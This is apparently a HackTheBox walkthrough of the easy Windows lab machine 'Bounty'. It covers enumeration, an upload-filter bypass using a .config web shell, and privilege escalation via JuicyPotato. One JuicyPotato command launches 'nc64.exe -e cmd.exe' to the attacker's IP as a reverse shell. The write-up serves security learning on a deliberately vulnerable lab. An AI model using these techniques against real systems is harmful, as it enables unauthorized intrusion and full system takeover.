HackTheBox - Bounty Walkthrough | Word Count: 523 | Reading Time: 3mins | Post Views:
Introduction
OS : WindowsDifficulty : EasyPoints : 0Release : 16 Jun, 2018IP : 10.10.10.93
Enumeration Nmap scan result 1 2 3 4 5 6 7 8 9 Nmap scan report for 10.10.10.93 Host is up (0.064s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After some enumuration we found nothing so we decided to run gobuster.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 $ gobuster dir -u http://10.10.10.93/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x asp,aspx =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.93/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: asp,aspx [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /transfer.aspx (Status: 200) [Size: 941] /*checkout*.aspx (Status: 400) [Size: 11] /*docroot*.aspx (Status: 400) [Size: 11] /*.aspx (Status: 400) [Size: 11] /http%3A%2F%2Fwww.aspx (Status: 400) [Size: 11] /http%3A.aspx (Status: 400) [Size: 11] /UploadedFiles (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/] /q%26a.aspx (Status: 400) [Size: 11] /**http%3a.aspx (Status: 400) [Size: 11]
Founded paths
/transfer.aspx - Secure transfer upload functionality
/UploadedFiles - Path where the uploaded files are stored
User Flag we tried to upload aspx reverse shell but it failed based on the file extension check, so we have to bypass the check so we changed the file extension from .aspx to .config
Reference: https://book.hacktricks.xyz/pentesting-web/file-upload
aspx files are not executed with the ,config extension then
i found the .config reverse shell file here https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet/blob/master/web.exit
using above reverse shell we got shell as merlin
1 2 3 4 5 6 7 8 9 meterpreter > search -f user.txt Found 1 result... ================= Path Size (bytes) Modified (UTC) ---- ------------ -------------- c:\Users\merlin\Desktop\user.txt 34 2023-09-13 08:33:05 -0400 meterpreter > getuid Server username: BOUNTY\merlin
Got the user flag.
Root Flag merlin user account has SeImpersonatePrivilege enabled
1 2 3 4 5 6 7 8 9 C:\>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled in machine we use this for elevate the local privileges to System. Normally, these privileges are assigned to service users, admins, and local systems — high integrity elevated users.
To escalate to system, we are going to using the Juicy Potato: https://github.com/ohpe/juicy-potato/releases
Command used to get shellJuicyPotato.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p c:\windows\system32\cmd.exe -a "/c c:\users\merlin\desktop\nc64.exe -e cmd.exe 10.10.1x.xx 1234" -t *
After executing the above command we got the shell as nt authority\system
1 2 3 4 5 6 7 8 9 C:\>hostname bounty C :\>whoami nt authority \system C :\>type users \administrator \desktop \root.txt type users \administrator \desktop \root.txt f95efxxxxx .......
Got the root flag.
